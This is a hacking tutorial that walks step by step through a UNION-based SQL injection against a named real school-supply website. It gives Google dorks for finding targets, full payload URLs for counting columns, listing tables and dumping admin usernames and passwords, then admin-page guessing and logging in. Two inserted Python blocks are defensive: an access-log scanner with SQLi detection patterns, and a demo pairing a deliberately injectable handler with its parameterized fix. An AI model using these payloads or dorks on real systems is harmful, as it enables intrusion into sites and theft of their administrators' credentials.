This is my second tutorial on hacking websites through SQL injection attacks; the first one used blind SQL injection. In this attack we hack the database of a website, through which we can steal credentials and log in to the website using those credentials. If a site has an admin panel, then you can log in to that admin panel and get hold of the whole website.
Step 1: Find Vulnerable Websites
1.) Go to www.google.com and type:
a.) inurl:php?id=
b.) inurl:asp?id=
Download the biggest dork list from HERE
Password = Redeyehack
This Google dork finds pages that take a parameter in the query string (the GET method) and hence may be vulnerable.
2.) After finding a vulnerable link on the website, suppose the link is:
http://www.schoolarcade.com.pk/book_detail.php?id=309, then try
http://www.schoolarcade.com.pk/book_detail.php?id=309'
Now if you get an SQL error like:
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/schoolar/public_html/book_detail.php on line 41
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Then it proves that the site is SQLi vulnerable. Now let's move to step 2.
Step 2: Find the number of columns in the table
1.) Type order by 1-- at the end of the URL so that the final URL becomes: http://www.schoolarcade.com.pk/book_detail.php?id=309 order by 1--
If you don't get an error then try order by 2-- and so on until you get the error. Suppose you got the error at order by 13--
It means there are a total of 12 columns in the table.
Step 3: Find Vulnerable Columns
1.) Now at the end of the URL type: union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database(), and replace id=309 with id=-309 so the final URL becomes:
http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()
Now you can see some numbers on the screen, as shown in the image; these are the numbers of the columns that are vulnerable (i.e. whose content is echoed in the page). In the image we can see that columns 1,3,5,6,7,8 are vulnerable; we will use columns 7 and 8 in the following steps.
Here we write up to 12 because the total number of columns we found in the previous step is 12. information_schema is a database which keeps information about every column, table and constraint of the database.
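From the defender's side, Steps 1 to 3 leave a very recognisable trail in the web server's access log: a stray quote in a numeric parameter, a run of order by N-- requests from one client, and then union select against information_schema. The following scanner is an added example and not part of the original tutorial; the log lines it reads are constructed in Apache combined format with documentation IP addresses, and the signature names (quote_probe, order_by_probe, union_select, schema_enum) and the min_probe_values threshold are my own choices.

```python
"""Added example (not from the original tutorial): a small access-log scanner
that flags the request shapes the tutorial's Steps 1-3 leave behind, namely a
stray quote in a numeric parameter, sequential ORDER BY n-- probing, UNION
SELECT, and information_schema enumeration. Log lines are constructed in the
Apache combined format; IPs are documentation addresses."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Each signature is applied to the URL-decoded query string.
SIGNATURES = {
    "quote_probe": re.compile(r"=\s*-?\d+'"),                        # id=309'
    "order_by_probe": re.compile(r"order\s+by\s+(\d+)\s*--", re.I),   # order by 13--
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),  # union select all ...
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
}

# Constructed sample log: one client walking through Steps 1-3, one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /book_detail.php?id=309 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /book_detail.php?id=309%27 HTTP/1.1" 200 412
203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /book_detail.php?id=309%20order%20by%201-- HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /book_detail.php?id=309%20order%20by%202-- HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:53 +0000] "GET /book_detail.php?id=309%20order%20by%2013-- HTTP/1.1" 200 412
203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /book_detail.php?id=-309%20union%20select%20all%201,2,3%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 2200
198.51.100.4 - - [10/Oct/2023:13:57:01 +0000] "GET /book_detail.php?id=310 HTTP/1.1" 200 5001
198.51.100.4 - - [10/Oct/2023:13:57:05 +0000] "GET /contact.php HTTP/1.1" 200 1800
"""


def decoded_query(path):
    """Return the URL-decoded query string of a request path ('' if none)."""
    return unquote_plus(urlsplit(path).query)


def scan(log_text, min_probe_values=3):
    """Group flagged requests per client IP.

    Returns {ip: {"hits": {signature: count}, "order_by_values": [...],
                  "probing": bool}} for IPs with at least one hit. 'probing' is
    set when one client has tried min_probe_values distinct ORDER BY positions,
    which is the column-counting loop of Step 2."""
    findings = defaultdict(lambda: {"hits": defaultdict(int), "order_by_values": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines rather than abort the scan
        query = decoded_query(m.group("path"))
        for name, pattern in SIGNATURES.items():
            hit = pattern.search(query)
            if hit:
                findings[m.group("ip")]["hits"][name] += 1
                if name == "order_by_probe":
                    findings[m.group("ip")]["order_by_values"].add(int(hit.group(1)))
    report = {}
    for ip, data in findings.items():
        report[ip] = {
            "hits": dict(data["hits"]),
            "order_by_values": sorted(data["order_by_values"]),
            "probing": len(data["order_by_values"]) >= min_probe_values,
        }
    return report


if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info)
```

Decoding the query string before matching matters because the payloads arrive percent-encoded (%27, %20); matching the raw request line would miss them. The per-IP grouping is what turns individually harmless-looking lines (a single order by 2--) into an alert.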
Step 4: Finding the database version
1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,version(),8,9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 7 with "version()", a function that displays the database version.
If it displays a version greater than 5 as shown in the image below, then you can go ahead; otherwise leave this site and find another one (information_schema, which the remaining steps rely on, exists only from MySQL 5 onward).
Step 5: Finding table names
1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 8 with "group_concat(table_name)". The table_name column of information_schema.tables contains the table names of the whole database.
Now you can see in the image below that it lists all the tables of the current database. Here I found an interesting table, admin_users, which lists the usernames and passwords of the site administrators.
Step 6: Finding column names
1.) Try this URL: http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_schema=database()
Here we replaced vulnerable column 8 with "group_concat(column_name)" and also replaced "information_schema.tables" with "information_schema.columns".
Now it will list all columns as shown in the image below, and we have to find the columns belonging to the admin_users table.
The columns corresponding to username and password are user_id and user_pass. Now we have the table and column names; we just have to retrieve the data from the table.
Step 7: To retrieve the username and password, replace vulnerable column 8 with "group_concat(user_id,0x3a,user_pass)"; here user_id and user_pass are the column names and 0x3a is the hex equivalent of ":", used just to separate username and password.
Replace the string starting with "from information_schema ...." with "from admin_users", where admin_users is the table name.
Now you can view the username and password as "admin::Password"
And now you have the site administrator's username and password as well; you just have to find the admin login page.
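Everything from the quote error in Step 1 to the credential dump above works for one reason: book_detail.php pastes the id parameter straight into the SQL text. The following is an added example, not code from the tutorial or from the site it describes, that rebuilds that handler in Python on an in-memory SQLite database with constructed sample rows (a books table and an admin_users table), then shows the two fixes that close it: a bound parameter, and rejecting anything that is not an integer before it reaches the database. The function names, the sample data and the returned "ERROR: ..." string (standing in for the error page the tutorial looks for) are my own; the MySQL-specific parts of the tutorial (information_schema, version()) are not reproduced.

```python
"""Added example (not from the original tutorial): the book_detail.php pattern
the tutorial targets, rebuilt in Python on an in-memory SQLite database with
constructed sample rows. vulnerable_lookup() concatenates the id parameter into
the SQL string; safe_lookup() binds it as a parameter. MySQL-specific parts of
the tutorial (information_schema, version()) are not reproduced."""
import sqlite3


def build_db():
    """Constructed sample schema: a books table plus the admin_users table the tutorial reads."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE books (id INTEGER, title TEXT, author TEXT);
        INSERT INTO books VALUES (309, 'Intro to Algebra', 'A. Writer');
        INSERT INTO books VALUES (310, 'Physics I', 'B. Writer');
        CREATE TABLE admin_users (user_id TEXT, user_pass TEXT);
        INSERT INTO admin_users VALUES ('admin', 'Password');
    """)
    return conn


def vulnerable_lookup(conn, book_id):
    """The defect: the raw query-string value becomes part of the SQL text, so a
    quote breaks the syntax, ORDER BY n probes the column count and a UNION
    appends rows from another table. The caught error is returned as text to
    mirror the verbose error page the tutorial looks for (a second defect:
    database errors should be logged, not shown to the client)."""
    sql = "SELECT id, title, author FROM books WHERE id=" + book_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        return "ERROR: " + str(err)


def safe_lookup(conn, book_id):
    """Fix 1: a bound parameter is always data, never SQL, so the query's
    structure cannot change whatever the string contains."""
    sql = "SELECT id, title, author FROM books WHERE id=?"
    return conn.execute(sql, (book_id,)).fetchall()


def safe_lookup_typed(conn, book_id):
    """Fix 2 (defence in depth): the id is documented as an integer, so reject
    anything else before it reaches the database at all."""
    if not book_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, title, author FROM books WHERE id=?"
    return conn.execute(sql, (int(book_id),)).fetchall()


def demo():
    """Runs the tutorial's three probe shapes against both handlers and returns the results."""
    conn = build_db()
    probes = {
        "quote": "309'",
        "order_by_too_many": "309 order by 4--",
        "union": "-309 union select all 1, group_concat(user_id || ':' || user_pass), 3 from admin_users",
    }
    return {
        name: {"vulnerable": vulnerable_lookup(conn, p), "safe": safe_lookup(conn, p)}
        for name, p in probes.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Running it shows the vulnerable handler returning an error for the quote and the out-of-range ORDER BY, and a row from admin_users for the union, while the parameterized handler returns an empty result for all three because the whole string is compared against the id column as a value. Parameterizing is the fix; the integer check and not echoing database errors are the extra layers that remove the feedback Steps 1 and 2 depend on.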
Step 8: Finding the admin page
1.) You can guess it or try a few common admin page paths like
a.) www.site.com/admin/
b.) www.site.com/administrators
c.) www.site.com/login.php
After finding the login page, log in using the username and password found above...
Congrats!!! You have hacked the website.
This is a manual SQLi attack. You can also use a tool:
Havij, which will automatically find the vulnerability and extract all the tables and their data from a site's database for you. You can download it from here.
Note: This is for educational purposes only. Don't use it to cause any harm to any website or its database.